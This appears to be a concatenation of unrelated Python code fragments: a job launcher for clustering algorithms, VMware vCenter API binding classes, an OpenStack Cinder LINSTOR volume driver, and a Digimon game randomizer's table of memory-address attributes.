, 'python', ''.join(('./', algname, '.py')), ''.join(('-i=../', netfile, netext))
, ''.join(('-ol=../', taskpath, _EXTCLNODES)))
execpool.execute(Job(name=_SEPNAMEPART.join((algname, task)), workdir=_ALGSDIR, args=args, timeout=timeout
#, ondone=postexec
, stdout=os.devnull, stderr=''.join((taskpath, _EXTLOG))))
execnum = 1
# Note: execution on shuffled network instances is now generalized for all algorithms
## Run again for all shuffled nets
#if not selfexec:
# selfexec = True
# netdir = os.path.split(netfile)[0] + '/'
# #print('Netdir: ', netdir)
# for netfile in glob.iglob(''.join((escapePathWildcards(netdir), escapePathWildcards(task), | |
self.error = error
self.start_time = start_time
self.end_time = end_time
self.user = user
VapiStruct.__init__(self)
SubTaskInfo._set_binding_type(type.StructType(
'com.vmware.vcenter.lcm.sub_task_info', {
'progress': type.ReferenceType('com.vmware.cis.task_client', 'Progress'),
'last_updated_time': type.DateTimeType(),
'result': type.OptionalType(type.ReferenceType(__name__, 'Result')),
'external_tools': type.ListType(type.ReferenceType(__name__, 'ExternalTool')),
'description': type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage'),
'service': type.IdType(resource_types='com.vmware.vapi.service'),
'operation': type.IdType(resource_types='com.vmware.vapi.operation'),
'parent': type.OptionalType(type.IdType()),
'target': type.OptionalType(type.ReferenceType('com.vmware.vapi.std_client', 'DynamicID')),
'status': type.ReferenceType('com.vmware.cis.task_client', 'Status'),
'cancelable': type.BooleanType(),
'error': type.OptionalType(type.AnyErrorType()),
'start_time': type.OptionalType(type.DateTimeType()),
'end_time': type.OptionalType(type.DateTimeType()),
'user': type.OptionalType(type.StringType()),
},
SubTaskInfo,
False,
None))
class TaskInfo(VapiStruct):
"""
The container that contains the status information of a deployment.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'status',
{
'RUNNING' : [('progress', True), ('start_time', True)],
'FAILED' : [('progress', True), ('error', False), ('start_time', True), ('end_time', True)],
'SUCCEEDED' : [('progress', True), ('start_time', True), ('end_time', True)],
'BLOCKED' : [('progress', True), ('start_time', True)],
'PENDING' : [],
}
),
]
def __init__(self,
metadata_file=None,
state=None,
progress=None,
last_updated_time=None,
subtask_order=None,
subtasks=None,
appliance_info=None,
result=None,
additional_info=None,
description=None,
service=None,
operation=None,
parent=None,
target=None,
status=None,
cancelable=None,
error=None,
start_time=None,
end_time=None,
user=None,
):
"""
:type metadata_file: :class:`str`
:param metadata_file: The path of the metadata file.
:type state: :class:`str` or ``None``
:param state: The state of appliance being deployed.
May not have any state information.
:type progress: :class:`com.vmware.cis.task_client.Progress`
:param progress: The total progress of the deployment operation.
This attribute is optional and it is only relevant when the value
of ``#status`` is one of
:attr:`com.vmware.cis.task_client.Status.RUNNING`,
:attr:`com.vmware.cis.task_client.Status.FAILED`,
:attr:`com.vmware.cis.task_client.Status.SUCCEEDED`, or
:attr:`com.vmware.cis.task_client.Status.BLOCKED`.
:type last_updated_time: :class:`datetime.datetime`
:param last_updated_time: The time that the last update is registered.
:type subtask_order: :class:`list` of :class:`list` of :class:`str` or ``None``
:param subtask_order: The ordered list of subtasks for this deployment operation.
Only :class:`set` when the appliance state is RUNNING_IN_PROGRESS,
FAILED, CANCELLED and SUCCEEDED.
:type subtasks: (:class:`dict` of :class:`str` and :class:`SubTaskInfo`) or ``None``
:param subtasks: The map of the deployment subtasks and their status information.
Only :class:`set` when the appliance state is RUNNING_IN_PROGRESS,
FAILED, CANCELLED and SUCCEEDED.
:type appliance_info: :class:`DeploymentInfo` or ``None``
:param appliance_info: Information about the appliance deployed.
Such information may not be available for requests that are not for
deployment (validation/recommendation).
:type result: :class:`DataValue` or ``None``
:param result: The result of validation or recommendation requests.
Not applicable for precheck/deployment operation.
:type additional_info: :class:`str` or ``None``
:param additional_info: Additional information that a response may contain.
Not all response will contain additional information.
:type description: :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param description: Description of the operation associated with the task.
:type service: :class:`str`
:param service: Identifier of the service containing the operation.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.vapi.service``. When methods return a value of this
class as a return value, the attribute will be an identifier for
the resource type: ``com.vmware.vapi.service``.
:type operation: :class:`str`
:param operation: Identifier of the operation associated with the task.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.vapi.operation``. When methods return a value of this
class as a return value, the attribute will be an identifier for
the resource type: ``com.vmware.vapi.operation``.
:type parent: :class:`str` or ``None``
:param parent: Parent of the current task.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.cis.task``. When methods return a value of this class
as a return value, the attribute will be an identifier for the
resource type: ``com.vmware.cis.task``.
This attribute will be None if the task has no parent.
:type target: :class:`com.vmware.vapi.std_client.DynamicID` or ``None``
:param target: Identifier of the target created by the operation or an existing
one the operation performed on.
This attribute will be None if the operation has no target or
multiple targets.
:type status: :class:`com.vmware.cis.task_client.Status`
:param status: Status of the operation associated with the task.
:type cancelable: :class:`bool`
:param cancelable: Flag to indicate whether or not the operation can be cancelled. The
value may change as the operation progresses.
:type error: :class:`Exception` or ``None``
:param error: Description of the error if the operation status is "FAILED".
If None the description of why the operation failed will be
included in the result of the operation (see
:attr:`com.vmware.cis.task_client.Info.result`).
:type start_time: :class:`datetime.datetime`
:param start_time: Time when the operation is started.
This attribute is optional and it is only relevant when the value
of ``status`` is one of
:attr:`com.vmware.cis.task_client.Status.RUNNING`,
:attr:`com.vmware.cis.task_client.Status.BLOCKED`,
:attr:`com.vmware.cis.task_client.Status.SUCCEEDED`, or
:attr:`com.vmware.cis.task_client.Status.FAILED`.
:type end_time: :class:`datetime.datetime`
:param end_time: Time when the operation is completed.
This attribute is optional and it is only relevant when the value
of ``status`` is one of
:attr:`com.vmware.cis.task_client.Status.SUCCEEDED` or
:attr:`com.vmware.cis.task_client.Status.FAILED`.
:type user: :class:`str` or ``None``
:param user: Name of the user who performed the operation.
This attribute will be None if the operation is performed by the
system.
"""
self.metadata_file = metadata_file
self.state = state
self.progress = progress
self.last_updated_time = last_updated_time
self.subtask_order = subtask_order
self.subtasks = subtasks
self.appliance_info = appliance_info
self.result = result
self.additional_info = additional_info
self.description = description
self.service = service
self.operation = operation
self.parent = parent
self.target = target
self.status = status
self.cancelable = cancelable
self.error = error
self.start_time = start_time
self.end_time = end_time
self.user = user
VapiStruct.__init__(self)
TaskInfo._set_binding_type(type.StructType(
'com.vmware.vcenter.lcm.task_info', {
'metadata_file': type.StringType(),
'state': type.OptionalType(type.StringType()),
'progress': type.OptionalType(type.ReferenceType('com.vmware.cis.task_client', 'Progress')),
'last_updated_time': type.DateTimeType(),
'subtask_order': type.OptionalType(type.ListType(type.ListType(type.StringType()))),
'subtasks': type.OptionalType(type.MapType(type.StringType(), type.ReferenceType(__name__, 'SubTaskInfo'))),
'appliance_info': type.OptionalType(type.ReferenceType(__name__, 'DeploymentInfo')),
'result': type.OptionalType(type.OpaqueType()),
'additional_info': type.OptionalType(type.StringType()),
'description': type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage'),
'service': type.IdType(resource_types='com.vmware.vapi.service'),
'operation': type.IdType(resource_types='com.vmware.vapi.operation'),
'parent': type.OptionalType(type.IdType()),
'target': type.OptionalType(type.ReferenceType('com.vmware.vapi.std_client', 'DynamicID')),
'status': type.ReferenceType('com.vmware.cis.task_client', 'Status'),
'cancelable': type.BooleanType(),
'error': type.OptionalType(type.AnyErrorType()),
'start_time': type.OptionalType(type.DateTimeType()),
'end_time': type.OptionalType(type.DateTimeType()),
'user': type.OptionalType(type.StringType()),
},
TaskInfo,
False,
None))
class TemporaryNetwork(VapiStruct):
"""
Configuration of the temporary network which is used during
upgrade/migrate.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'mode',
{
'STATIC' : [('ip', True), ('dns_servers', True), ('prefix', True), ('gateway', True)],
'DHCP' : [],
}
),
]
def __init__(self,
ip_family=None,
mode=None,
ip=None,
dns_servers=None,
prefix=None,
gateway=None,
):
"""
:type ip_family: :class:`TemporaryNetwork.IpType` or ``None``
:param ip_family: Network IP address family.
If None, defaults to IPV4
:type mode: :class:`TemporaryNetwork.NetworkMode`
:param mode: Network mode.
:type ip: :class:`str`
:param ip: Network IP address. Required for static mode only.
This attribute is optional and it is only relevant when the value
of ``mode`` is :attr:`TemporaryNetwork.NetworkMode.STATIC`.
:type dns_servers: :class:`list` of :class:`str`
:param dns_servers: A comma-separated list of IP addresses of DNS servers. A JSON array
such as ["192.168.3.11", "127.0.0.1"]. Required for static mode only.
DNS servers must be reachable from the machine that runs CLI
installer
This attribute is optional and it is only relevant when the value
of ``mode`` is :attr:`TemporaryNetwork.NetworkMode.STATIC`.
:type prefix: :class:`long`
:param prefix: Network prefix length. Required for static mode only. Remove if the
mode is "dhcp". This is the number of bits set in the subnet mask;
for instance, if the subnet mask is 255.255.255.0, there are 24
bits in the binary version of the subnet mask, so the prefix length
is 24. If used, the values must be in the inclusive range of 0 to
32 for IPv4 and 0 to 128 for IPv6. Required for static mode only.
This attribute is optional and it is only relevant when the value
of ``mode`` is :attr:`TemporaryNetwork.NetworkMode.STATIC`.
:type gateway: :class:`str`
:param gateway: Gateway of the network. Required for static mode only.
This attribute is optional and it is only relevant when the value
of ``mode`` is :attr:`TemporaryNetwork.NetworkMode.STATIC`.
"""
self.ip_family = ip_family
self.mode = mode
self.ip = ip
self.dns_servers = dns_servers
self.prefix = prefix
self.gateway = gateway
VapiStruct.__init__(self)
class IpType(Enum):
"""
Network IP address family.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
IPV4 = None
"""
IPv4 Type of IP address.
"""
IPV6 = None
"""
IPv6 | |
<reponame>scottwedge/openstack-cinder
# Copyright (c) 2014-2019 LINBIT HA Solutions GmbH
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""This driver connects Cinder to an installed LINSTOR instance.
See https://docs.linbit.com/docs/users-guide-9.0/#ch-openstack-linstor
for more details.
"""
import socket
import uuid
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import importutils
from oslo_utils import units
from cinder import exception
from cinder.i18n import _
from cinder.image import image_utils
from cinder import interface
from cinder.volume import configuration
from cinder.volume import driver
try:
import linstor
lin_drv = linstor.Linstor
except ImportError:
linstor = None
lin_drv = None
# To override these values, update cinder.conf in /etc/cinder/
linstor_opts = [
cfg.StrOpt('linstor_default_volume_group_name',
default='drbd-vg',
help='Default Volume Group name for LINSTOR. '
'Not Cinder Volume.'),
cfg.StrOpt('linstor_default_uri',
default='linstor://localhost',
help='Default storage URI for LINSTOR.'),
cfg.StrOpt('linstor_default_storage_pool_name',
default='DfltStorPool',
help='Default Storage Pool name for LINSTOR.'),
cfg.FloatOpt('linstor_volume_downsize_factor',
default=4096,
help='Default volume downscale size in KiB = 4 MiB.'),
cfg.IntOpt('linstor_default_blocksize',
default=4096,
help='Default Block size for Image restoration. '
'When using iSCSI transport, this option '
'specifies the block size.'),
cfg.IntOpt('linstor_autoplace_count',
default=0,
help='Autoplace replication count on volume deployment. '
'0 = Full cluster replication without autoplace, '
'1 = Single node deployment without replication, '
'2 or greater = Replicated deployment with autoplace.'),
cfg.BoolOpt('linstor_controller_diskless',
default=True,
help='True means Cinder node is a diskless LINSTOR node.')
]
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.register_opts(linstor_opts, group=configuration.SHARED_CONF_GROUP)
CINDER_UNKNOWN = 'unknown'
DM_VN_PREFIX = 'CV_'
DM_SN_PREFIX = 'SN_'
DISKLESS = 'DISKLESS'
LVM = 'LVM'
LVM_THIN = 'LVM_THIN'
ZFS = 'ZFS'
ZFS_THIN = 'ZFS_THIN'
class LinstorBaseDriver(driver.VolumeDriver):
"""Cinder driver that uses LINSTOR for storage.
Version History:
.. code-block:: none
1.0.0 - Initial driver
1.1.0 - Updated driver to match LINSTOR backend improvements
"""
VERSION = '1.1.0'
# ThirdPartySystems wiki page
CI_WIKI_NAME = 'LINBIT_LINSTOR_CI'
def __init__(self, *args, **kwargs):
super(LinstorBaseDriver, self).__init__(*args, **kwargs)
LOG.debug('START: Base Init Linstor')
self.configuration.append_config_values(linstor_opts)
self.default_pool = self.configuration.safe_get(
'linstor_default_storage_pool_name')
self.default_uri = self.configuration.safe_get(
'linstor_default_uri')
self.default_downsize_factor = self.configuration.safe_get(
'linstor_volume_downsize_factor')
self.default_vg_name = self.configuration.safe_get(
'linstor_default_volume_group_name')
self.default_blocksize = self.configuration.safe_get(
'linstor_default_blocksize')
self.diskless = self.configuration.safe_get(
'linstor_controller_diskless')
self.ap_count = self.configuration.safe_get(
'linstor_autoplace_count')
self.default_backend_name = self.configuration.safe_get(
'volume_backend_name')
self.host_name = socket.gethostname()
@staticmethod
def get_driver_options():
return linstor_opts
def _ping(self):
with lin_drv(self.default_uri) as lin:
return lin.ping()
def _clean_uuid(self):
"""Returns a UUID string, WITHOUT braces."""
# Some uuid library versions put braces around the result.
# We don't want them, just a plain [0-9a-f-]+ string.
uuid_str = str(uuid.uuid4())
uuid_str = uuid_str.replace("{", "")
uuid_str = uuid_str.replace("}", "")
return uuid_str
# LINSTOR works in kiB units; Cinder uses GiB.
def _vol_size_to_linstor(self, size):
return int(size * units.Mi - self.default_downsize_factor)
def _vol_size_to_cinder(self, size):
return int(size / units.Mi)
def _is_clean_volume_name(self, name, prefix):
try:
if (name.startswith(CONF.volume_name_template % "") and
uuid.UUID(name[7:]) is not None):
return prefix + name[7:]
except ValueError:
return None
try:
if uuid.UUID(name) is not None:
return prefix + name
except ValueError:
return None
def _snapshot_name_from_cinder_snapshot(self, snapshot):
sn_name = self._is_clean_volume_name(snapshot['id'], DM_SN_PREFIX)
return sn_name
def _cinder_volume_name_from_drbd_resource(self, rsc_name):
cinder_volume_name = rsc_name.split(DM_VN_PREFIX)[1]
return cinder_volume_name
def _drbd_resource_name_from_cinder_snapshot(self, snapshot):
drbd_resource_name = '{}{}'.format(DM_VN_PREFIX,
snapshot['volume_id'])
return drbd_resource_name
def _drbd_resource_name_from_cinder_volume(self, volume):
drbd_resource_name = '{}{}'.format(DM_VN_PREFIX, volume['id'])
return drbd_resource_name
def _get_api_resource_list(self):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
api_reply = lin.resource_list()[0].__dict__['_rest_data']
if api_reply:
return api_reply
else:
return None
def _get_api_resource_dfn_list(self):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
api_reply = lin.resource_dfn_list()[0].__dict__['_rest_data']
if api_reply:
return api_reply
else:
return None
def _get_api_node_list(self):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
api_reply = lin.node_list()[0].__dict__['_rest_data']
if api_reply:
return api_reply
else:
return None
def _get_api_storage_pool_dfn_list(self):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
api_reply = lin.storage_pool_dfn_list()[0].__dict__['_rest_data']
if api_reply:
return api_reply
else:
return None
def _get_api_storage_pool_list(self):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
api_reply = lin.storage_pool_list()[0].__dict__['_rest_data']
if api_reply:
return api_reply
else:
return None
def _get_api_volume_extend(self, rsc_target_name, new_size):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
vol_reply = lin.volume_dfn_modify(
rsc_name=rsc_target_name,
volume_nr=0,
size=self._vol_size_to_linstor(new_size))
return vol_reply
def _api_snapshot_create(self, drbd_rsc_name, snapshot_name):
lin = linstor.Resource(drbd_rsc_name, uri=self.default_uri)
snap_reply = lin.snapshot_create(snapshot_name)
return snap_reply
def _api_snapshot_delete(self, drbd_rsc_name, snapshot_name):
lin = linstor.Resource(drbd_rsc_name, uri=self.default_uri)
snap_reply = lin.snapshot_delete(snapshot_name)
return snap_reply
def _api_rsc_dfn_delete(self, drbd_rsc_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
snap_reply = lin.resource_dfn_delete(drbd_rsc_name)
return snap_reply
def _api_storage_pool_create(self,
node_name,
storage_pool_name,
storage_driver,
driver_pool_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
sp_reply = lin.storage_pool_create(
node_name=node_name,
storage_pool_name=storage_pool_name,
storage_driver=storage_driver,
driver_pool_name=driver_pool_name)
return sp_reply
def _api_rsc_dfn_create(self, rsc_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
rsc_dfn_reply = lin.resource_dfn_create(rsc_name)
return rsc_dfn_reply
def _api_volume_dfn_create(self, rsc_name, size):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
vol_dfn_reply = lin.volume_dfn_create(
rsc_name=rsc_name,
storage_pool=self.default_pool,
size=size)
return vol_dfn_reply
def _api_volume_dfn_set_sp(self, rsc_target_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
snap_reply = lin.volume_dfn_modify(
rsc_name=rsc_target_name,
volume_nr=0,
set_properties={
'StorPoolName': self.default_pool
})
return snap_reply
def _api_rsc_create(self, rsc_name, node_name, diskless=False):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
if diskless:
storage_pool = None
else:
storage_pool = self.default_pool
new_rsc = linstor.ResourceData(rsc_name=rsc_name,
node_name=node_name,
storage_pool=storage_pool,
diskless=diskless)
rsc_reply = lin.resource_create([new_rsc], async_msg=False)
return rsc_reply
def _api_rsc_autoplace(self, rsc_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
new_rsc = linstor.Resource(name=rsc_name, uri=self.default_uri)
new_rsc.placement.redundancy = self.ap_count
new_rsc.placement.storage_pool = self.default_pool
rsc_reply = new_rsc.autoplace()
return rsc_reply
def _api_rsc_delete(self, rsc_name, node_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
rsc_reply = lin.resource_delete(node_name=node_name,
rsc_name=rsc_name)
return rsc_reply
def _api_volume_dfn_delete(self, rsc_name, volume_nr):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
rsc_reply = lin.volume_dfn_delete(rsc_name=rsc_name,
volume_nr=volume_nr)
return rsc_reply
def _api_snapshot_volume_dfn_restore(self,
src_rsc_name,
src_snap_name,
new_vol_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
vol_reply = lin.snapshot_volume_definition_restore(
from_resource=src_rsc_name,
from_snapshot=src_snap_name,
to_resource=new_vol_name)
return vol_reply
def _api_snapshot_resource_restore(self,
src_rsc_name,
src_snap_name,
new_vol_name):
lin = linstor.Resource(src_rsc_name, uri=self.default_uri)
new_rsc = lin.restore_from_snapshot(src_snap_name, new_vol_name)
# Adds an aux/property KV for synchronous return from snapshot restore
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
aux_prop = {}
aux_prop["Aux/restore"] = "done"
lin.volume_dfn_modify(
rsc_name=new_vol_name,
volume_nr=0,
set_properties=aux_prop)
if new_rsc.name == new_vol_name:
return True
return False
def _get_rsc_path(self, rsc_name):
rsc_list_reply = self._get_api_resource_list()
for rsc in rsc_list_reply:
if rsc["name"] == rsc_name and rsc["node_name"] == self.host_name:
for volume in rsc["volumes"]:
if volume["volume_number"] == 0:
return volume["device_path"]
def _get_local_path(self, volume):
try:
full_rsc_name = (
self._drbd_resource_name_from_cinder_volume(volume))
return self._get_rsc_path(full_rsc_name)
except Exception:
message = _('Local Volume not found.')
raise exception.VolumeBackendAPIException(data=message)
def _get_spd(self):
# Storage Pool Definition List
spd_list_reply = self._get_api_storage_pool_dfn_list()
spd_list = []
for spd in spd_list_reply:
spd_list.append(spd["storage_pool_name"])
return spd_list
def _get_storage_pool(self):
# Fetch Storage Pool List
sp_list_reply = self._get_api_storage_pool_list()
# Separate the diskless nodes
sp_diskless_list = []
sp_list = []
node_count = 0
if sp_list_reply:
for node in sp_list_reply:
if node["storage_pool_name"] == self.default_pool:
sp_node = {}
sp_node["node_name"] = node["node_name"]
sp_node["sp_uuid"] = node["uuid"]
sp_node["sp_name"] = node["storage_pool_name"]
if node["provider_kind"] == DISKLESS:
diskless = True
sp_node["sp_free"] = -1.0
sp_node["sp_cap"] = -1.0
sp_node["sp_allocated"] = 0.0
else:
diskless = False
if "free_capacity" in node:
sp_node["sp_free"] = round(
int(node["free_capacity"]) /
units.Mi,
2)
sp_node["sp_cap"] = round(
int(node["total_capacity"]) /
units.Mi,
2)
drivers = [LVM, LVM_THIN, ZFS, ZFS_THIN, DISKLESS]
# Driver selection
if node["provider_kind"] in drivers:
sp_node['driver_name'] = node["provider_kind"]
else:
sp_node['driver_name'] = str(node["provider_kind"])
if diskless:
sp_diskless_list.append(sp_node)
else:
sp_list.append(sp_node)
node_count += 1
# Add the diskless nodes to the end of the list
if sp_diskless_list:
sp_list.extend(sp_diskless_list)
return sp_list
def _get_volume_stats(self):
data = {}
data["volume_backend_name"] = self.default_backend_name
data["vendor_name"] = "LINBIT"
data["driver_version"] = self.VERSION
data["pools"] = []
sp_data = self._get_storage_pool()
rd_list = self._get_resource_definitions()
# Total volumes and capacity
num_vols = 0
for rd in rd_list:
num_vols += 1
# allocated_sizes_gb = []
free_gb = []
total_gb = []
thin_enabled = False
# Total & Free capacity for Local Node
single_pool = {}
for sp in sp_data:
if "Diskless" not in sp["driver_name"]:
thin_backends = [LVM_THIN, ZFS_THIN]
if sp["driver_name"] in thin_backends:
thin_enabled = True
if "sp_cap" in sp:
if sp["sp_cap"] >= 0.0:
total_gb.append(sp["sp_cap"])
if "sp_free" in sp:
if sp["sp_free"] >= 0.0:
free_gb.append(sp["sp_free"])
# Allocated capacity
sp_allocated_size_gb = 0.0
local_resources = []
reply = self._get_api_resource_list()
if reply:
for rsc in reply:
if rsc["node_name"] == self.host_name:
local_resources.append(rsc["name"])
for rsc_name in local_resources:
rsc = linstor.Resource(str(rsc_name))
if not rsc.is_diskless(self.host_name):
sp_allocated_size_gb += round(
int(rsc.volumes[0].size) / units.Gi, 2)
single_pool["pool_name"] = data["volume_backend_name"]
single_pool["free_capacity_gb"] = min(free_gb) if free_gb else 0
single_pool["total_capacity_gb"] = min(total_gb) if total_gb else 0
single_pool["provisioned_capacity_gb"] = sp_allocated_size_gb
| |
Element",
addresses=[0x02665CE2],
number_of_bytes=1,
min_value=Get_Element_Type(0, 0, 30),
max_value=Get_Element_Type(0, 0, 30),
is_little_endian=True, ),
Attribute(
name="Muchomon +DP",
addresses=[0x02665CE4],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Muchomon HP",
addresses=[0x02665CE6],
number_of_bytes=2,
min_value=Min_HP_Multiplier(600,fire_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(600,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Muchomon Circle",
addresses=[0x02665CE8],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(320,fire_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(320,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Muchomon Triangle",
addresses=[0x02665d04],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(220,fire_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(220,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Muchomon Cross",
addresses=[0x02665d20],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,fire_special_modifier,rookie_modifier,7),
max_value=Max_Cross_Multiplier(0,fire_special_modifier,rookie_modifier,7),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Muchomon Cross Effect",
addresses=[0x02665dac],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Candlemon 031
Attribute(
name="Candlemon Element",
addresses=[0x02665E1e],
number_of_bytes=1,
min_value=Get_Element_Type(0, 0, 31),
max_value=Get_Element_Type(0, 0, 31),
is_little_endian=True, ),
Attribute(
name="Candlemon +DP",
addresses=[0x02665E20],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Candlemon HP",
addresses=[0x02665E22],
number_of_bytes=2,
min_value=Min_HP_Multiplier(480,fire_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(480,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Candlemon Circle",
addresses=[0x02665E24],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(380,fire_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(380,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Candlemon Triangle",
addresses=[0x02665e40],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(270,fire_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(270,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Candlemon Cross",
addresses=[0x02665e5c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,fire_special_modifier,rookie_modifier,5),
max_value=Max_Cross_Multiplier(0,fire_special_modifier,rookie_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Candlemon Cross Effect",
addresses=[0x02665ee8],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#D-Otamamon 032
Attribute(
name="D-Otamamon Element",
addresses=[0x02665F5A],
number_of_bytes=1,
min_value=Get_Element_Type(0, 0, 32),
max_value=Get_Element_Type(0, 0, 32),
is_little_endian=True, ),
Attribute(
name="D-Otamamon +DP",
addresses=[0x02665F5C],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="D-Otamamon HP",
addresses=[0x02665F5E],
number_of_bytes=2,
min_value=Min_HP_Multiplier(550,fire_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(550,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="D-Otamamon Circle",
addresses=[0x02665f60],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(300,fire_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(300,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="D-Otamamon Triangle",
addresses=[0x02665f7c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,fire_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(200,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="D-Otamamon Cross",
addresses=[0x02665f98],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,fire_special_modifier,rookie_modifier,12),
max_value=Max_Cross_Multiplier(150,fire_special_modifier,rookie_modifier,12),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="D-Otamamon Cross Effect",
addresses=[0x2666154],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Goburimon 033
Attribute(
name="Goburimon Element",
addresses=[0x026661c6],
number_of_bytes=1,
min_value=Get_Element_Type(0, 0, 33),
max_value=Get_Element_Type(0, 0, 33),
is_little_endian=True, ),
Attribute(
name="Goburimon +DP",
addresses=[0x026661c8],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Goburimon HP",
addresses=[0x026661CA],
number_of_bytes=2,
min_value=Min_HP_Multiplier(500,fire_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(500,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Goburimon Circle",
addresses=[0x026661CC],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(300,fire_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(300,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Goburimon Triangle",
addresses=[0x026661e8],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(300,fire_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(300,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Goburimon Cross",
addresses=[0x02666204],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(300,fire_special_modifier,rookie_modifier,0),
max_value=Max_Cross_Multiplier(300,fire_special_modifier,rookie_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Goburimon Cross Effect",
addresses=[0x02666290],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Vikemon 034
Attribute(
name="Vikemon Element",
addresses=[0x2666302],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 34),
max_value=Get_Element_Type(16, 3, 34),
is_little_endian=True, ),
Attribute(
name="Vikemon +DP",
addresses=[0x2666304],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Vikemon HP",
addresses=[0x2666306],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2420,ice_special_modifier,ultimate_modifier),
